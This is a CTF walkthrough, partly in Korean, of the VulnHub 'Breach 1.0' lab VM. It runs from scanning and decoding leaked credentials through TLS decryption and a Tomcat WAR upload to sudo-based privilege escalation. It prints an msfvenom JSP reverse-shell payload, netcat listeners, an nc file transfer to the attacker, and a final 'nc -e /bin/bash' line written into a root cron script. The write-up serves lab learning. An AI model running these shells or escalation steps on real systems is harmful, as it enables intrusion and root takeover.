INFO

Name : Breach

Entry : 18 / 35

Level : ?

VulnHub URL : https://www.vulnhub.com/entry/breach-1,152/

GOAL

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

SETUP

I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used VirtualBox this time.

 

DESCRIPTION

First in a multi-part series, Breach 1.0 is meant to be beginner to intermediate boot2root/CTF challenge. Solving will take a combination of solid information gathering and persistence. Leave no stone unturned. The VM is configured with a static IP address (192.168.110.140) so you will need to configure your host-only adaptor to this subnet. Many thanks to knightmare and rastamouse for testing and providing feedback. Shout-out to g0tmi1k for maintaining #vulnhub and hosting my first challenge. If you run into any issues, you can find me on Twitter: https://twitter.com/mrb3n813 or on IRC in #vulnhub. Looking forward to the write-ups, especially any unintended paths to local/root.

Note, you may need to use 7zip to extract the ZIP.

 


 

TABLE OF CONTENTS

1. DISCOVERY

2. SCANNING

3. WEB RECONNAISSANCE & EXPLOITATION

4. POST EXPLOITATION

5. PRIVILEGE ESCALATION


 

 

1. DISCOVERY

: static 192.168.110.140​

 

 

 


 

 

2. SCANNING

PORT      STATE SERVICE
1/tcp     open  tcpmux
3/tcp     open  compressnet
4/tcp     open  unknown
6/tcp     open  unknown
7/tcp     open  echo
9/tcp     open  discard
13/tcp    open  daytime
17/tcp    open  qotd
19/tcp    open  chargen
20/tcp    open  ftp-data
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
24/tcp    open  priv-mail
25/tcp    open  smtp
26/tcp    open  rsftp
30/tcp    open  unknown
32/tcp    open  unknown
33/tcp    open  dsp?
37/tcp    open  time?
42/tcp    open  nameserver?
43/tcp    open  whois?
49/tcp    open  tacacs?
53/tcp    open  domain?
70/tcp    open  gopher?
79/tcp    open  finger?
80/tcp    open  http                   Apache httpd 2.4.7 ((Ubuntu))
81/tcp    open  http                   Code-Crafters Ability Mail Server http config yiKfJ
82/tcp    open  http                   Catwalk (Canon imageRUNNER C5000-series printer http config)
83/tcp    open  pop3                   MailGate pop3d
84/tcp    open  http-proxy             Bfilter proxy
85/tcp    open  http                   Mobile Air Mouse httpd
88/tcp    open  http                   Virata-EmWeb 49 (HP PhotoSmart/Deskjet printer http config)
89/tcp    open  su-mit-tg?
90/tcp    open  ssh                    (protocol 2.0)
99/tcp    open  http                   GoAhead WebServer (Peppercon/Paradox alarm system http config)
100/tcp   open  csta                   Alcatel OmniPCX Enterprise
106/tcp   open  pop3pw?
109/tcp   open  pop2?
110/tcp   open  rtsp
111/tcp   open  telnet                 BusyBox telnetd 1.00-pre7 - 1.14.0
113/tcp   open  ident?
119/tcp   open  finger                 Digital UNIX fingerd
125/tcp   open  ftp                    Symantec Raptor Firewall ftpd
135/tcp   open  telnet                 FORE Systems ES-3810
139/tcp   open  netbios-ssn?
143/tcp   open  finger                 Windows fingerd
144/tcp   open  http                   Allied Telesyn ARc router http config 483474342
146/tcp   open  http                   D-Link DHP-540 VoIP Phone http config
161/tcp   open  http                   Dbox2 Neutrino httpd
163/tcp   open  smtp                   LiteMail smtpd
179/tcp   open  http                   WebSTAR httpd 0iPhhDb
199/tcp   open  smux?
211/tcp   open  ftp                    FileZilla ftpd (Mandatory SSL)
212/tcp   open  http                   RapidLogic httpd 52
222/tcp   open  http                   Sony BDP-BX58 TV http config H_H
254/tcp   open  unknown
255/tcp   open  imap                   Lotus Domino secure imapd (SSL redirect)
256/tcp   open  ssh                    (protocol 21836)
259/tcp   open  esro-gen?
264/tcp   open  http                   Transmission BitTorrent management httpd
280/tcp   open  http                   Allegro RomPager WBDc (Intel 460T Standalone Switch)
301/tcp   open  unknown
306/tcp   open  http                   Konica Minolta bizhub 423 printer http config
311/tcp   open  asip-webadmin?
340/tcp   open  http                   BaseHTTPServer 45 (Python sTzFmpTX)
366/tcp   open  http                   Western Digital My Book http config
389/tcp   open  nntp                   Lotus Domino nntpd 7caHV (posting denied)
406/tcp   open  adobe-crossdomain      Unity3D game engine webplayer cross-domain policy (domain: K_.i..#..; ports: ?*,g.)
407/tcp   open  timbuktu?
416/tcp   open  http-proxy             thttpd (Blue Coat PacketShaper 3500 firewall)
417/tcp   open  telnet
425/tcp   open  icad-el?
427/tcp   open  svrloc?
443/tcp   open  ident                  FTPRush FTP client identd
444/tcp   open  snpp?
445/tcp   open  ftp                    Amoks PlayStation Portable ftpd
458/tcp   open  appleqtc?
464/tcp   open  finger                 Lexmark T642 printer fingerd
465/tcp   open  http                   NetPort httpd _Hop (Polycom VSX 8000 http config )..7..wT)
481/tcp   open  http                   Citrix Access Gateway firewall http config
497/tcp   open  http                   Icecast streaming media server
......

 

 

: tried to login ftp / find users via finger / find any mount directories via nfs and doesn't work.

┌──(root💀takudaddy)-[~]
└─# telnet 192.168.110.140 25                2 ⚙
Trying 192.168.110.140...
Connected to 192.168.110.140.
Escape character is '^]'.
550 12345 0ff0808800cf0000ffff70000f877f70000c70008008ff8088fff00Connection closed by foreign host


┌──(root💀takudaddy)-[~]
└─# ftp 192.168.110.140                      2 ⚙
Connected to 192.168.110.140.
550 12345 0f7000f800770008777000000000000000f80008f7f70088000cf00421 Service not available, remote server has closed connection
ftp> quit



[*] Using auxiliary/scanner/finger/finger_users
msf6 auxiliary(scanner/finger/finger_users) > set RHOSTS 192.168.110.140
RHOSTS => 192.168.110.140
msf6 auxiliary(scanner/finger/finger_users) > exploit

[*] 192.168.110.140:79    - 192.168.110.140:79 No users found.
[*] 192.168.110.140:79    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


┌──(root💀takudaddy)-[~]
└─# showmount -e 192.168.110.140
clnt_create: RPC: Unable to receive

 

 


 

 

3. WEB ENUMERATION

 

 

 

3-1) scanning directories

2021/04/04 13:04:09 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 1953]
/icons/               (Status: 403) [Size: 288] 
/index.html           (Status: 200) [Size: 1098]
/breach.html          (Status: 200) [Size: 284] 
/server-status/       (Status: 403) [Size: 296] 

 

 

 

3-2) digging port 80

┌──(root💀takudaddy)-[~]
└─# curl -v 192.168.110.140
*   Trying 192.168.110.140:80...
* Connected to 192.168.110.140 (192.168.110.140) port 80 (#0)
> GET / HTTP/1.1
> Host: 192.168.110.140
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 04 Apr 2021 13:19:54 GMT
< Server: Apache/2.4.7 (Ubuntu)
< Last-Modified: Mon, 06 Jun 2016 18:33:33 GMT
< ETag: "44a-534a04f49139d"
< Accept-Ranges: bytes
< Content-Length: 1098
< Vary: Accept-Encoding
< Content-Type: text/html
< 
<!DOCTYPE html>

<html>
<head>
<title>Welcome to Breach 1.0</title>
</head>




<body bgcolor="#000000">

<font color="green">
<p>Initech was breached and the board of directors voted to bring in their internal Initech Cyber Consulting, LLP division to assist. Given the high profile nature of the breach and nearly catastrophic losses, there have been many subsequent attempts against the company. Initech has tasked their TOP consultants, led by Bill Lumbergh, CISSP and Peter Gibbons, C|EH, SEC+, NET+, A+ to contain and perform analysis on the breach.</p> 

<p>Little did the company realize that the breach was not the work of skilled hackers, but a parting gift from a disgruntled former employee on his way out. The TOP consultants have been hard at work containing the breach. 
However, their own work ethics and the mess left behind may be the company's downfall.</p>

<center><a href="initech.html" target="_blank"> <img src="/images/milton_beach.jpg" 
width=500 height=500> </a></center>


<!------Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

</body>
</html>
* Connection #0 to host 192.168.110.140 left intact
                                                          

 

Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo

 

 

 

 

dercryt the hash

┌──(root💀takudaddy)-[/study]
└─# echo "Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo" | base64 -d | base64 -d
pgibbons:damnitfeel$goodtobeagang$ta

or using base64decode.org 

 

pgibbons : damnitfeel$goodtobeagang$ta

 

 

 

 

 

once I clicked the picture, it brings me to the new address. initech.html

 

 

 

Employee portal

impresscms

let's try to login with

pgibbons:damnitfeel$goodtobeagang$ta

 

 

It works!

Peter Gibbon

 

 

 

 

/breach.html

 

 

 

/images

 

 

 

이미지 확인 툴 exiftool 사용

 

┌──(root💀takudaddy)-[~]
└─# exiftool bill.png 
ExifTool Version Number         : 12.16
File Name                       : bill.png
Directory                       : .
File Size                       : 315 KiB
File Modification Date/Time     : 2016:06:05 08:35:33+09:00
File Access Date/Time           : 2021:04:06 12:47:54+09:00
File Inode Change Date/Time     : 2021:04:06 12:47:48+09:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 610
Image Height                    : 327
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Warning                         : [minor] Text chunk(s) found after PNG IDAT (may be ignored by some readers)
Comment                         : coffeestains
Image Size                      : 610x327
Megapixels                      : 0.199
                                                                               
                        
┌──(root💀takudaddy)-[~]
└─# exiftool bill.png | grep -i -e 'File name' -e 'Comment'
File Name                       : bill.png
Comment                         : coffeestains

: coffeestains

 

 

 

 

┌──(root💀takudaddy)-[/study]
└─# strings initech.jpg | more                                                 2 ⚙
JFIF
Ducky
&Adobe


┌──(root💀takudaddy)-[/study]
└─# strings milton_beach.jpg | more                                            2 ⚙
JFIF
`Exif
Google
0220
 !###
&)&")
""""""""""""""""""""""""""""""""""""""""""""""""""


┌──(root💀takudaddy)-[/study]
└─# strings swingline.jpg | more                                               2 ⚙
JFIF
Ocad$Rev: 14797 $
XICC_PROFILE
HLino
mntrRGB XYZ 
acspMSFT
IEC sRGB
-HP  
cprt
3desc
lwtpt
bkpt
rXYZ
gXYZ
bXYZ
dmnd
pdmdd
vued
view
$lumi
meas
$tech
rTRC
gTRC
bTRC
text
Copyright (c) 1998 Hewlett-Packard Company
desc
sRGB IEC61966-2.1
sRGB IEC61966-2.1
XYZ 
XYZ 
XYZ 
XYZ 
XYZ 
desc
IEC http://www.iec.ch
IEC http://www.iec.ch
desc
.IEC 61966-2.1 Default RGB colour space - sRGB
.IEC 61966-2.1 Default RGB colour space - sRGB
desc
,Reference Viewing Condition in IEC61966-2.1
,Reference Viewing Condition in IEC61966-2.1
view
XYZ 
meas
sig 
CRT curv
q


 

 

┌──(root💀takudaddy)-[/study] └─# curl http://192.168.110.140/breach.html 2 ⨯ 2 ⚙ <!DOCTYPE html> <html> <head> <title>YEEAAAAHHH</title> </head> <body> <img src="/images/bill.png" width=500 height=500> <FORM METHOD="LINK" ACTION="index.html"> <INPUT TYPE="submit" VALUE="Start here!"> </FORM> </body> <!-----nothing to see here --------------> </html>

 

 

 

 

 

3-3) digging port 8080

┌──(root💀takudaddy)-[/study]
└─# curl http://192.168.110.140/breach.html                                2 ⨯ 2 ⚙
<!DOCTYPE html>

<html>
<head>
<title>YEEAAAAHHH</title>
</head>
<body>

<img src="/images/bill.png" width=500 height=500>

<FORM METHOD="LINK" ACTION="index.html">
<INPUT TYPE="submit" VALUE="Start here!">
</FORM>

</body>


<!-----nothing to see here -------------->

</html>

 

 

 

tried to decode

┌──(root💀takudaddy)-[/study]
└─# echo cHJpbnQgIlBXTkVEXG4iIHggNSA7ICRfPWBwd2RgOyBwcmludCAiXG51cGxvYWRpbmcgeW91ciBob21lIGRpcmVjdG9yeTogIiwkXywiLi4uIFxuXG4iOw== | base64 -d
print "PWNED\n" x 5 ; $_=`pwd`; print "\nuploading your home directory: ",$_,"... \n\n";     

> print "PWNED\n" x 5 ; $_=`pwd`; print "\nuploading your home directory: ",$_,"... \n\n";

 

 

 

 


 

 

 

4. EXPLOITATION

 

 

 

 

Got something suspectable in the last msg.

192.168.110.140/.keystore Bob

SSL stream

 

┌──(root💀takudaddy)-[/study]
└─# wget 192.168.110.140/.keystore Bob              
--2021-04-04 19:23:49--  http://192.168.110.140/.keystore
Connecting to 192.168.110.140:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2245 (2.2K)
Saving to: ‘.keystore’

.keystore            100%[===================>]   2.19K  --.-KB/s    in 0s      

2021-04-04 19:23:49 (442 MB/s) - ‘.keystore’ saved [2245/2245]

--2021-04-04 19:23:49--  http://bob/
Resolving bob (bob)... failed: Name or service not known.
wget: unable to resolve host address ‘bob’
FINISHED --2021-04-04 19:23:49--
Total wall clock time: 0.02s
Downloaded: 1 files, 2.2K in 0s (442 MB/s)
                                                                  
┌──(root💀takudaddy)-[/study]
└─# file .keystore     
.keystore: Java KeyStore

┌──(root💀takudaddy)-[/study]
└─# strings .keystore                                                      2 ⚙
tomcat
R|(A
q15Y?
]c["y
Yrf!K\
@V      e
2j;2>
A@7B
`=aw

 

Guess it is kind of a certificate.

And tomcat might be a password of this certificate

 

 

Let's try to find some SSL implementation file.

http://192.168.110.140/impresscms/_SSL_test_phase1.pcap

 

 

 

┌──(root💀takudaddy)-[/study]
└─# ls                                                                     2 ⚙
_SSL_test_phase1.pcap

 

 

Let's open this file with wireshark.

 

Seems like TLS stream is encrypted.

We have to import a certificate to decrypt.

Now let's extract private key from .keynote file

 

 

 

# keytool -list -v -keystore key

┌──(root💀takudaddy)-[/study]
└─# cp .keystore key                                                       3 ⚙
                                                                               
┌──(root💀takudaddy)-[/study]
└─# ls                                                                     3 ⚙
key  _SSL_test_phase1.pcap
                                                                               
┌──(root💀takudaddy)-[/study]
└─# keytool -list -v -keystore key                                         3 ⚙
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Enter keystore password: tomcat
Keystore type: JKS
Keystore provider: SUN

Your keystore contains 1 entry

Alias name: tomcat
Creation date: May 21, 2016
Entry type: PrivateKeyEntry
Certificate chain length: 1
Certificate[1]:
Owner: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Issuer: CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
Serial number: 60856e88
Valid from: Sat May 21 02:51:07 KST 2016 until: Fri Aug 19 02:51:07 KST 2016
Certificate fingerprints:
         SHA1: D5:D2:49:C3:69:93:CC:E5:39:A9:DE:5C:91:DC:F1:26:A6:40:46:53
         SHA256: F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31
Signature algorithm name: SHA256withRSA
Subject Public Key Algorithm: 2048-bit RSA key
Version: 3

Extensions: 

#1: ObjectId: 2.5.29.14 Criticality=false
SubjectKeyIdentifier [
KeyIdentifier [
0000: 47 6B A3 37 ED A5 1F 0A   0D 61 CA AA 17 9C F4 8C  Gk.7.....a......
0010: 10 64 87 DF                                        .d..
]
]



*******************************************
*******************************************



Warning:
The JKS keystore uses a proprietary format. 
It is recommended to migrate to PKCS12 which is an industry standard format using 
"keytool -importkeystore -srckeystore key -destkeystore key -deststoretype pkcs12".

 

PKCS12 형태로 바꿔줘야 하며

사용법은 마지막 줄 커맨드 확인.

 

 

┌──(root💀takudaddy)-[/study]
└─# keytool -v -importkeystore -srckeystore key -srcalias tomcat -destkeystore newkey -deststoretype PKCS12 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Importing keystore key to newkey...
Enter destination keystore password:  
Re-enter new password: 
Enter source keystore password: tomcat

[Storing newkey]
                                                                               
┌──(root💀takudaddy)-[/study]
└─# ls                                                                     3 ⚙
key  newkey  _SSL_test_phase1.pcap

 

 

 

인증 키 확인

┌──(root💀takudaddy)-[/study]
└─# openssl pkcs12 -in newkey -nocerts -nodes                              3 ⚙
Enter Import Password:
Bag Attributes
    friendlyName: tomcat
    localKeyID: 54 69 6D 65 20 31 36 31 37 35 39 38 36 37 32 38 30 36 
Key Attributes: <No Attributes>
-----BEGIN PRIVATE KEY-----
MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQCjJXnELHvCEyTT
ZW/cJb7sFuwIUy5l5DkBXD9hBgRtpUSIv9he5RbJQwGuwyw5URbm3pa7z1eoRjFW
HLMVzKYte6AyyjUoWcc/Fs9fiu83+F0G36JmmFcxLFivVQwCHKhrajUc15i/XtCr
ExEDNL0igM8YnCPq4J9lXrXUanLltR464F7cJdLbkqHiqRvoFiOQi9e3CIZ86uoY
UNBupj2/njMFRuB7dEoeaQ/otHZIgCgjbP76I+/xyL/RkGxYuU0e1tpQiLxTi7kF
nJ1Rd55Gd+DvzuBiI9F+fxa4+TSQvRvQEzJIKowbPw6h82Cd66yFju8c2AKiaDie
F+AqVim3AgMBAAECggEBAIr2Ssdr1GY0hDODvUnY5MyXoahdobGsOVoNRvbPd0ol
cUDBl/0MSOJZLr+7Apo3lbhEdEO4kkOEtlVQ0MGKtSkcmhFo5updvjbgqPYKk0Qr
SqGmLuAQdoQt78Q4Pqg13MbRijfs8/BdRIPTE7SVYVxYNw4RQQ65EUv45gvuN7ur
shV5WSHVaN5QyUHyOTKcvFuBqxb9Mfo2NtRGZCG2QuG8V/C+k2k8+Q+n2wDaOXw8
sIWKVMHngOMcW1OBnM3ac/bTeI2+LI5cMsBZqYlLmkH1AOlnCgpH7389NbRQQJSo
sExX51v5r2mmI1JdzszwQYqRfH7+nugDRjBEN2ztqFECgYEA4eBiLFP9MeLhjti8
PDElSG4MVf/I9WXfLDU79hev7npRw8LE0rzPgawXOL8NhTbp8/X1D071bGaA3rCU
oBEEPclXlSwXHroZVjJALDhaPrIfFT6gBXlb9wAYSzWYED4LKXDuddVChrTo4Lmx
XaHb/KM7kpPuUWr+xccEEuNJBnMCgYEAuOduxGz2Ecd+nwATsZpjgG5/SwLL/rd0
TEMNQbB/XUIOI8mZpw5Dn1y71qCijk/A+oVzohc6Dspso4oXLMy0b+HCFPTKuGgg
Hf8QV5YbDg0urH8KNNEEH7Dx/C6cp6vVAcj6eQ2wOwW62yVY8gy2elWH0gte1BXl
hHiKIaLueq0CgYEAoAwi4+/7Ny7gzhvKfQgBt+mqOgGM/jzZvnRV8VDlayAm8YP/
fKcmjWZH6gCN7vdzHFcJ9nfnNJEI/UG3fhewnqscsOlV1ILe0xG2IN8pKsWBescu
EdLlFAZwMFJgVhnwRMPtY3bhtZtYa2uIPqUiwEdVPc4uDmi276LNwyhjJPsCgYA7
ANcO5TpMiB12vX6LURnpVNlX5WeVO5Nn9omXaavq5XY/o0hdz6ZyhxQFtDLLONX6
23T/x2umZp/uO9WTXStC/IaDS24ZFFkTWV4spOCzRi+bqdpm6j/noP5HG9SviJyr
Oif7Uwvmebibz7onWzkrpnl15Fz5Tpd0A0cI3sY87QKBgQDLZ9pl505OMHOyY6Xr
geszoeaj4cQrRF5MO2+ad81LT3yoLjZyARaJJMEAE7FZxPascemlg9KR3JPnevIU
3RdMGHX75yr92Sd8lNQvSO6RWUuRnc889xN1YrpPx5G1VppIFqTrcB0gAiREkeUA
pHiPhbocjixKJz9xx+pG0jDkrg==
-----END PRIVATE KEY-----
                                

 

와이어 샤크로 import 시킨 후 사용하면

암호화 되었던 TLS stream을 볼 수 있겠다.

 

 

 

 

키 등록하고

 

 

 

리로딩 하면

 

192.168.110.140:8443/_M@nag3Me

tomcat : s4cret

dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC (base64)

 

 

┌──(root💀takudaddy)-[/study]
└─# echo dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC | base64 -d            127 ⨯ 2 ⚙
tomcat:Tt\5D8F(#!*u=G)4m7zB   

tomcat : Tt\5D8F(#!*u=G)4m7zB

 

 

 

 

also found something interesting

cmd.jsp file

 

 

 

 

 

 

Let's try to login tomcat.

 

 

 

Not working.

 

 

 

tried with burp proxy, https but still doesn't work.

┌──(root💀takudaddy)-[/study]
└─# nmap -sV 192.168.110.140 -p 8443 60149                                                                      35 ⨯ 3 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-05 21:24 KST
Nmap scan report for 192.168.110.140
Host is up (0.00019s latency).

PORT     STATE SERVICE        VERSION
8443/tcp open  ssl/https-alt?
MAC Address: 08:00:27:91:D5:3E (Oracle VirtualBox virtual NIC)

 

 

 

 

┌──(root💀takudaddy)-[/study]
└─# curl -v https://192.168.110.140:8443/_M@nag3Me                                                                   2 ⚙
*   Trying 192.168.110.140:8443...
* Connected to 192.168.110.140 (192.168.110.140) port 8443 (#0)
* ALPN, offering h2
* ALPN, offering http/1.1
* successfully set certificate verify locations:
*  CAfile: /etc/ssl/certs/ca-certificates.crt
*  CApath: /etc/ssl/certs
* TLSv1.3 (OUT), TLS handshake, Client hello (1):
* OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to 192.168.110.140:8443 
* Closing connection 0
curl: (35) OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to 192.168.110.140:8443 

 

 

이게 되야 하는데 안 됨.

 

 

 

씨름 하다가 문득

칼리 기본 ip가 192.168.10번 대역이었음을 인지하고

부랴부랴 110번 대역 IP를 버프에 추가한 뒤

파이어폭스 프록시 세팅값을 변경,

시도하고 나니

 

 

 

 

 

 

일단 반응이 왔다!!!

 

 

 

 

 

 

추가로

 

 

 

프록시 request 보고 url 뒤에 /html을 붙여주니

 

!!!!!

 

 

 

tomcat : Tt\5D8F(#!*u=G)4m7zB

 

 

 

와 드뎌 성공!

반나절 걸림 ;;

 

 

 

 

 

 


 

 

 

5. POST EXPLOITATION

 

 

 

여기서부턴 전에 해봤던 과정이다.

 

 

WAR 파일 업로드가 가능하니

해당 확장자를 가진 페이로드를 생성

 

 

 

┌──(root💀takudaddy)-[/study]
└─# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.10 LPORT=7979 -f war > shell.war                         2 ⚙
Payload size: 1104 bytes
Final size of war file: 1104 bytes

 

 

 

위 파일을 업로드하고

nc나 msfconsole로

리스너 기동해 침투.

 

 

msfconsole

┌──(root💀takudaddy)-[/study]
└─# msfconsole -q                                                   1 ⨯ 2 ⚙
msf6 > use /multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp 
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.110.4
LHOST => 192.168.110.4
msf6 exploit(multi/handler) > set LPORT 7979
LPORT => 7979
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.110.4:7979 
[*] Command shell session 1 opened (192.168.110.4:7979 -> 192.168.110.140:60200) at 2021-04-06 11:49:56 +0900

id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat6@Breach:/var/lib/tomcat6$ whoami
whoami
tomcat6
tomcat6@Breach:/var/lib/tomcat6$ 

 

or

 

 

┌──(root💀takudaddy)-[/study]
└─# nc -lvp 7979                                                        2 ⚙
listening on [any] 7979 ...
192.168.110.140: inverse host lookup failed: Unknown host
connect to [192.168.110.4] from (UNKNOWN) [192.168.110.140] 60198
id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
bash  
id
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
python -c 'import pty;pty.spawn("/bin/bash")'
tomcat6@Breach:/var/lib/tomcat6$ 

 

 

digging

 

tomcat6@Breach:/home/milton$ cat some_script.sh
cat some_script.sh


 _____ _                   _                   _   _     _               _                   
|_   _| |                 ( )                 | | | |   (_)             | |                  
  | | | |__   ___ _ __ ___|/ ___   _ __   ___ | |_| |__  _ _ __   __ _  | |__   ___ _ __ ___ 
  | | | '_ \ / _ \ '__/ _ \ / __| | '_ \ / _ \| __| '_ \| | '_ \ / _` | | '_ \ / _ \ '__/ _ \
  | | | | | |  __/ | |  __/ \__ \ | | | | (_) | |_| | | | | | | | (_| | | | | |  __/ | |  __/
  \_/ |_| |_|\___|_|  \___| |___/ |_| |_|\___/ \__|_| |_|_|_| |_|\__, | |_| |_|\___|_|  \___|
                                                                  __/ |                      
                                                                 |___/                       

tomcat6@Breach:/home/milton$ 


tomcat6@Breach:/$ mysql -u root
mysql -u root
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 36
Server version: 5.5.49-0ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| impresscms         |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.01 sec)

mysql> use mysql
use mysql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

mysql> select * from user ;
select * from user ;
milton           | 6450d89bd3aff1d893b85d3ad65d2ec2   

 

 

6450d89bd3aff1d893b85d3ad65d2ec2 : thelaststraw

 

 

tomcat6@Breach:/$ su milton
su milton
Password: thelaststraw

milton@Breach:/$ id
id
uid=1000(milton) gid=1000(milton) groups=1000(milton),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare)



milton@Breach:~$ ls -al
ls -al
total 156
drwxr-xr-x 3 milton milton   4096 Jun  6  2016 .
drwxr-xr-x 4 root   root     4096 Jun  4  2016 ..
-rw------- 1 milton milton    326 Apr  6 08:10 .bash_history
-rw-r--r-- 1 milton milton    220 May 20  2016 .bash_logout
-rw-r--r-- 1 milton milton   3637 May 20  2016 .bashrc
drwx------ 2 milton milton   4096 May 20  2016 .cache
-rw-rw-r-- 1 milton milton   2245 May 20  2016 .keystore
-rw-rw-r-- 1 milton milton 111255 Jun  4  2016 my_badge.jpg
-rw------- 1 milton milton    407 Jun  4  2016 .mysql_history
-rw-r--r-- 1 milton milton    675 May 20  2016 .profile
-rw-r--r-- 1 root   root       66 Jun  4  2016 .selected_editor
-rwxrwxrwx 1 milton milton    755 Jun  4  2016 some_script.sh
milton@Breach:~$ nc -nv 192.168.110.4 8989 < my_badge.jpg
nc -nv 192.168.110.4 8989 < my_badge.jpg
(UNKNOWN) [192.168.110.4] 8989 (?) open

 

 

 

milton@Breach:~$ find / -writable -type d 2>/dev/null
find / -writable -type d 2>/dev/null
/proc/1588/task/1588/fd
/proc/1588/fd
/proc/1588/map_files
/home/milton
/home/milton/.cache
/tmp
/var/www/html/images
/var/lib/php5
/var/lib/tomcat6/webapps/swingline
/run/user/1000
/run/shm
/run/lock
/sys/fs/cgroup/systemd/user/1000.user/c2.session


milton@Breach:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
tomcat6:x:104:112::/usr/share/tomcat6:/bin/false
colord:x:105:114:colord colour management daemon,,,:/var/lib/colord:/bin/false
mysql:x:106:116:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
milton@Breach:~$ 

 

blumgergh = Bill Lumbergh

Bill??

coffeestatins

 

 

milton@Breach:/home$ su blumbergh
su blumbergh
Password: coffeestains

blumbergh@Breach:/home$ id
id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh)
blumbergh@Breach:/home$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh


blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
cat /usr/share/cleanup/tidyup.sh
#!/bin/bash

#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.

cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

 

 

 


 

 

 

6. PRIVILEGE ESCALATION

 

 

blumbergh@Breach:~$ echo "nc -e /bin/bash 192.168.110.4 4444" | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
e /usr/share/cleanup/tidyup.sh110.4 4444" | sudo /usr/bin/te 
